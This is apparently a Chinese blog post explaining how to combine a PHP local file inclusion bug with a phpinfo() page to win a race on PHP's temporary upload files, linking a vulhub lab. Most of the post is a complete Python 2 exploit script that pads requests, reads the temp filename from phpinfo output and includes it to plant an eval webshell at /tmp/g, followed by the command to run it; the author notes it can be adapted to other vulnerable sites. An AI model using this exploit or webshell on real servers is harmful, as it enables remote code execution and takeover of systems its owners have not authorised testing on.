我也是听朋友说有这个姿势的,github有集成好的环境

先讲一下利用phpinfo上传文件,然后在文件包含的原理:

在给PHP发送POST数据包时,如果数据包里包含文件区块,无论访问的代码中是否有处理文件上传的逻辑,php都会将这个文件保存成一个临时文件(通常是/tmp/php[6个随机字符]),这个临时文件在请求结束后就会被删除,同时,phpinfo页面会将当前请求上下文中所有变量都打印出来。但是文件包含漏洞和phpinfo页面通常是两个页面,理论上我们需要先发送数据包给phpinfo页面,然后从返回页面中匹配出临时文件名,将这个文件名发送给文件包含漏洞页面。

因为在第一个请求结束时,临时文件就会被删除,第二个请求就无法进行包含。

但是这并不代表我们没有办法去利用这点上传恶意文件,只要发送足够多的数据,让页面还未反应过来,就上传我们的恶意文件,然后文件包含:

1)发送包含了webshell的上传数据包给phpinfo,这个数据包的header,get等位置一定要塞满垃圾数据;

2)phpinfo这时会将所有数据都打印出来,其中的垃圾数据会将phpinfo撑得非常大

3)PHP默认缓冲区大小是4096,即PHP每次返回4096个字节给socket连接

4)所以,我们直接操作原生socket,每次读取4096个字节,只要读取到的字符里包含临时文件名,就立即发送第二个数据包

5)此时,第一个数据包的socket连接其实还没有结束,但是PHP还在继续每次输出4096个字节,所以临时文件还未被删除

6)我们可以利用这个时间差,成功包含临时文件,最后getshell

环境搭建

https://github.com/vulhub/vulhub/tree/master/php/inclusion

搭建完成访问  ip:8080/lfi.php?file=/etc/passwd    就会读取文件和包含

要想利用成功,还得借助python脚本,根据这个原理,感觉就是利用脚本做条件竞争

https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py       之后别的站存在这个漏洞,这个脚本需要修改些地方,比如文件名

#!/usr/bin/python

import sys

import threading

import socket

def setup(host, port):

    TAG="Security Test"

    PAYLOAD="""%s\r

<?php file_put_contents('/tmp/g', '<?=eval($_REQUEST[1])?>')?>\r""" % TAG

    REQ1_DATA="""-----------------------------7dbff1ded0714\r

Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r

Content-Type: text/plain\r

\r

%s

-----------------------------7dbff1ded0714--\r""" % PAYLOAD

    padding="A" * 5000

    REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r

Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r

HTTP_ACCEPT: """ + padding + """\r

HTTP_USER_AGENT: """+padding+"""\r

HTTP_ACCEPT_LANGUAGE: """+padding+"""\r

HTTP_PRAGMA: """+padding+"""\r

Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r

Content-Length: %s\r

Host: %s\r

\r

%s""" %(len(REQ1_DATA),host,REQ1_DATA)

    #modify this to suit the LFI script

    LFIREQ="""GET /lfi.php?file=%s HTTP/1.1\r

User-Agent: Mozilla/4.0\r

Proxy-Connection: Keep-Alive\r

Host: %s\r

\r

\r

"""

    return (REQ1, TAG, LFIREQ)

def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    

    s.connect((host, port))

    s2.connect((host, port))

    s.send(phpinforeq)

    d = ""

    while len(d) < offset:

        d += s.recv(offset)

    try:

        i = d.index("[tmp_name] =&gt; ")

        fn = d[i+17:i+31]

    except ValueError:

        return None

    s2.send(lfireq % (fn, host))

    d = s2.recv(4096)

    s.close()

    s2.close()

    if d.find(tag) != -1:

        return fn

counter=0

class ThreadWorker(threading.Thread):

    def __init__(self, e, l, m, *args):

        threading.Thread.__init__(self)

        self.event = e

        self.lock =  l

        self.maxattempts = m

        self.args = args

    def run(self):

        global counter

        while not self.event.is_set():

            with self.lock:

                if counter >= self.maxattempts:

                    return

                counter+=1

            try:

                x = phpInfoLFI(*self.args)

                if self.event.is_set():

                    break

                if x:

                    print "\nGot it! Shell created in /tmp/g"

                    self.event.set()

            except socket.error:

                return

def getOffset(host, port, phpinforeq):

    """Gets offset of tmp_name in the php output"""

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.connect((host,port))

    s.send(phpinforeq)

    d = ""

    while True:

        i = s.recv(4096)

        d+=i

        if i == "":

            break

        # detect the final chunk

        if i.endswith("0\r\n\r\n"):

            break

    s.close()

    i = d.find("[tmp_name] =&gt; ")

    if i == -1:

        raise ValueError("No php tmp_name in phpinfo output")

    print "found %s at %i" % (d[i:i+10],i)

    # padded up a bit

    return i+256

def main():

    print "LFI With PHPInfo()"

    print "-=" * 30

    if len(sys.argv) < 2:

        print "Usage: %s host [port] [threads]" % sys.argv[0]

        sys.exit(1)

    try:

        host = socket.gethostbyname(sys.argv[1])

    except socket.error, e:

        print "Error with hostname %s: %s" % (sys.argv[1], e)

        sys.exit(1)

    port=80

    try:

        port = int(sys.argv[2])

    except IndexError:

        pass

    except ValueError, e:

        print "Error with port %d: %s" % (sys.argv[2], e)

        sys.exit(1)

    poolsz=10

    try:

        poolsz = int(sys.argv[3])

    except IndexError:

        pass

    except ValueError, e:

        print "Error with poolsz %d: %s" % (sys.argv[3], e)

        sys.exit(1)

    print "Getting initial offset...",

    reqphp, tag, reqlfi = setup(host, port)

    offset = getOffset(host, port, reqphp)

    sys.stdout.flush()

    maxattempts = 1000

    e = threading.Event()

    l = threading.Lock()

    print "Spawning worker pool (%d)..." % poolsz

    sys.stdout.flush()

    tp = []

    for i in range(0,poolsz):

        tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))

    for t in tp:

        t.start()

    try:

        while not e.wait(1):

            if e.is_set():

                break

            with l:

                sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))

                sys.stdout.flush()

                if counter >= maxattempts:

                    break

        print

        if e.is_set():

            print "Woot!  \m/"

        else:

            print ":("

    except KeyboardInterrupt:

        print "\nTelling threads to shutdown..."

        e.set()

    print "Shuttin' down..."

    for t in tp:

        t.join()

if __name__=="__main__":

    main()

python2 python exp.py your-ip 8080 100

然后就去包含脚本生成的文件 /tmp/g  就可以执行命令了

文件包含-phpinfo()的更多相关文章

  1. php文件包含漏洞(利用phpinfo)复现

     利用docker复现该漏洞,访问http://192.168.80.156:8080/phpinfo.php,可以看到页面出现phpinfo页面 再访问http://192.168.80.156:8 ...

  2. PHP文件包含漏洞(利用phpinfo)复现

    0x01 简介 PHP文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来getshell.因为临时文件名是随机的,如果目标网站上存在phpinfo,则可以通过phpinfo来获 ...

  3. 【web】php文件包含(利用phpinfo)

    Docker搭建复现环境 地址:https://github.com/vulhub/vulhub/tree/master/php/inclusion ps. github单独下载一个文件夹的方法: 安 ...

  4. 文件上传之结合phpinfo与本地文件包含利用

    背景 某站点存在本地文件包含及phpinfo,可以利用其执行脚本. 原理 原理: 利用php post上传文件产生临时文件,phpinfo()读临时文件的路径和名字,本地包含漏洞生成1句话后门 1.p ...

  5. PHP文件包含漏洞攻防实战(allow_url_fopen、open_basedir)

    摘要 PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的.而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞.利用PHP文件包含漏洞入侵网站也是主流的 ...

  6. PHP任意文件包含绕过截断新姿势

    前言 此方法是@l3m0n叔叔给我分享的,原文已经发布在90sec 我没有90sec的账号,所以自己实践一下,顺道安利给访问我博客的小伙伴. 适用情况 可以控制协议的情况下,如果%00无法截断包含,可 ...

  7. phpmyadmin任意文件包含漏洞分析(含演示)

    0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发. 最新的CVE-2014-8959公告中,提到该程序多个版本存在任意文件包含漏洞,影响版本如下: ...

  8. CTF 文件包含与伪协议

    正巧在写代码审计的文章,无意间看到了一篇CTF的代码审计,CTF题目很好,用的姿势正如标题,文件包含和伪协议. 先放出原文链接(http://www.freebuf.com/column/150028 ...

  9. php文件包含漏洞(input与filter)

    php://input php://input可以读取没有处理过的POST数据.相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置.php:/ ...

随机推荐

  1. Codeforces Global Round 8 D. AND, OR and square sum (贪心,位运算)

    题意:有\(n\)个数,选择某一对数使二者分别\(or\)和\(and\)得到两个新值,求操作后所有数平方和的最大值. 题解:不难发现每次操作后,两个数的二进制表示下的\(1\)的个数总是不变的,所以 ...

  2. 被收费绘图工具 PUA 了怎么办?来看看这个老实工具吧

    本文非常适合 Electron 入门选手,墙裂推荐! 本文作者:HelloGitHub-蔡文心 大家好!这里是 HelloGitHub 推出的<讲解开源项目>系列,今天给大家带来的一款基于 ...

  3. 02、Jmeter正则表达式提取器

    转载自:http://blog.csdn.net/quiet_girl/article/details/50724313 在使用Jmeter过程中,会经常使用到正则表达式提取器提取器,虽然并不直接涉及 ...

  4. oslab oranges 一个操作系统的实现 实验一

    实验目的: 搭建基本实验环境,熟悉基本开发与调试工具 对应章节:第一.二章 实验内容: 1.认真阅读章节资料 2.在实验机上安装virtualbox,并安装ubuntu 3.安装ubuntu开发环境, ...

  5. HDU 6623 Minimal Power of Prime(思维)题解

    题意: 已知任意大于\(1\)的整数\(a = p_1^{q_1}p_2^{q_2} \cdots p_k^{q_k}\),现给出\(a \in [2,1e18]\),求\(min\{q_i\},q ...

  6. React 组件之间通信 All in One

    React 组件之间通信 All in One 组件间通信 1. 父子组件之间通信 props 2. 兄弟组件之间通信 3. 跨多层级的组件之间通信 Context API https://react ...

  7. VirtualBox All in One

    VirtualBox All in One 虚拟机 / VM / Virtual Machine x86 and AMD64/Intel64 VirtualBox is a powerful x86 ...

  8. HTTP/2 & Push Cache

    HTTP/2 & Push Cache HTTP/2 & 推送缓存 https://caniuse.com/#search=http2 https://jakearchibald.co ...

  9. 1月加密货币交易所访问量破3亿!NGK生态星空计划、NGK生态所带来双重利好!

    据最新数据显示,2021年一月份,加密货币交易所网站的访问量急剧上升.约有3.44亿访问者涌入了加密货币交易所,超过2020年12月的1.96亿访问者总数,创2018年1月以来新高. 加密货币交易所网 ...

  10. 区块链项目NGK未来价值几何?

    没有人可以预知NGK未来会涨到多少钱,就像比特币只有10美分时,也无法预测它会涨到现在的价格⼀样.那时候人们把CPU超频挖矿只作为⼀种爱好和娱乐.所以,人们也没有办法预知NGK未来的价格.但可以知道的 ...